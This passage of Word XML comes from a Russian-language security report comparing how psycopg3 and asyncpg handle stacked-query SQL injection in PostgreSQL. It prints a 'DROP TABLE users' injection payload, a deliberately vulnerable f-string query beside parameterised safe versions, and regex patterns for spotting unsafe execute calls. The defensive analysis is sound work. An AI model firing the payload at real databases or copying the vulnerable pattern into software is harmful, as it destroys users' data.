          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если разработчик случайно передал склеенную строку как первый аргумент (без params) — поведение как в пути 1. Если правильно: значение payload едет как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Bind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-аргумент:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Parse:   SELECT id, email FROM users WHERE name = $1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Bind:    $1 = 'x''; DROP TABLE users; --'   (длина 25 байт)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Execute: возвращает 0 строк</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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значения параметра не парсится PostgreSQL — это просто байты в текстовом значении. Стакинга нет.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если же разработчик попытается передать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SQL-текста с одновременным наличием params:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cur.execute("SELECT 1; DROP TABLE users", ())</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сервер отвечает:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: cannot insert multiple commands into a prepared statement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Parse отклонит строку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между значимыми токенами ещё до Bind.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Что отличает psycopg3 от psycopg2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 params</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: psycopg3 уходит в настоящий extended-protocol с раздельными Parse/Bind. Безопасность гарантирована тем, что значения </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">никогда не смешиваются с SQL-токенами</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на клиенте — нет mogrify, нет экранирования. Это сильнее, чем psycopg2: даже принципиально плохое экранирование (которого в psycopg2 нет, но в самописных адаптерах могло быть) тут отсутствует как стадия.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Без params</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: psycopg3 уязвим как psycopg2, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">видны оба результата</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cur.nextset()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — стакинг легче обнаружить в логах приложения (psycopg2 показывает только последний result).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executemany()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в psycopg3 формирует серию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-сообщений на одну Parse — стакинг блокирован на каждой итерации.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Server-side prepared statements (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">prepare_threshold</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) гарантируют extended-path после нескольких исполнений; первые N исполнений идут как «unnamed prepared» — тоже extended, тоже блокируют стакинг.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigations специфичные для драйвера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Всегда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cur.execute(sql, params)</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-placeholder, никогда f-string /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-форматирование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динамических identifiers — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">psycopg.sql.SQL("SELECT * FROM {}").format(sql.Identifier(table_name))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При миграции с psycopg2: SQL-строки вида </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"SET search_path TO foo; SELECT ..."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> нужно разбивать на два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 psycopg3 примет это, но в текст-режиме (без params) сохраняет уязвимость, если в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> есть пользовательский ввод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коде судьи: те же паттерны, что для psycopg2 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cursor.execute\(f"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cursor.execute\(".*\+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, плюс </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cursor.execute\(".*%\s*\w+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Версии</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">psycopg3 ≥ 3.0 (релиз 2021) — поведение стабильное. До 3.0 драйвер не существовал. Миграция с psycopg2 на psycopg3 — отдельная задача (см. официальный гайд), но с точки зрения защиты от stacked queries — психологически: если код был корректным в psycopg2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 params), он останется корректным в psycopg3 и получит дополнительный уровень защиты через extended-protocol.</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psycopg3 docs: «Differences from psycopg2» — https://www.psycopg.org/psycopg3/docs/basic/from_pg2.html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psycopg3 docs: «Server-side parameters binding» — https://www.psycopg.org/psycopg3/docs/basic/params.html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psycopg3 docs: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">prepare_threshold</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — https://www.psycopg.org/psycopg3/docs/api/connections.html#psycopg.Connection.prepare_threshold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R20 (sources/research.md, строки 332–333)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5.3 asyncpg</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Setup.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncpg (актуальная ветка 0.30.x) — нативный асинхронный драйвер, написан на Cython, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не использует libpq</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — реализует wire-protocol PostgreSQL напрямую. Логика выбора протокола: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">conn.execute(sql, *args)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с хотя бы одним arg → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">extended protocol всегда</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Parse + Bind + Execute), причём с server-side prepared statement и автоматическим кэшированием по SQL-тексту. Без args — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">conn.execute(sql)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> уходит как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">simple query</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через одно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-сообщение. У asyncpg нет client-side mogrify/экранирования вообще: либо параметры через wire ($1, $2), либо raw SQL без какой-либо обработки клиентом.</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import asyncpg</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async def search_users(conn: asyncpg.Connection, name: str):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    rows = await conn.fetch(f"SELECT id, email FROM users WHERE name = '{name}'")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return rows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">f-string-конкатенация без args. asyncpg не имеет промежуточной стадии экранирования — строка уходит на сервер как есть через simple-protocol.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Безопасный код.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def search_users(conn: asyncpg.Connection, name: str):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    rows = await conn.fetch("SELECT id, email FROM users WHERE name = $1", name)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return rows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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нативный placeholder PostgreSQL (asyncpg не использует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Значение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передаётся как arg → asyncpg формирует Parse-сообщение с одной командой и Bind-сообщение со значением.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload</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100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">x'; DROP TABLE users; --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Путь 1: simple (уязвимый код, без args).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="14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SELECT id, email FROM users WHERE name = 'x'; DROP TABLE users; --'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Оба statement-а исполняются. asyncpg возвращает результат только последнего statement —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не возвращает rows, поэтому </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">conn.fetch()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> отдаст пустой список, а </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">conn.execute()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> вернёт command-tag вида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Приложение получит «пустой ответ», таблицу — нет.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Путь 2: extended (безопасный код, с args).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
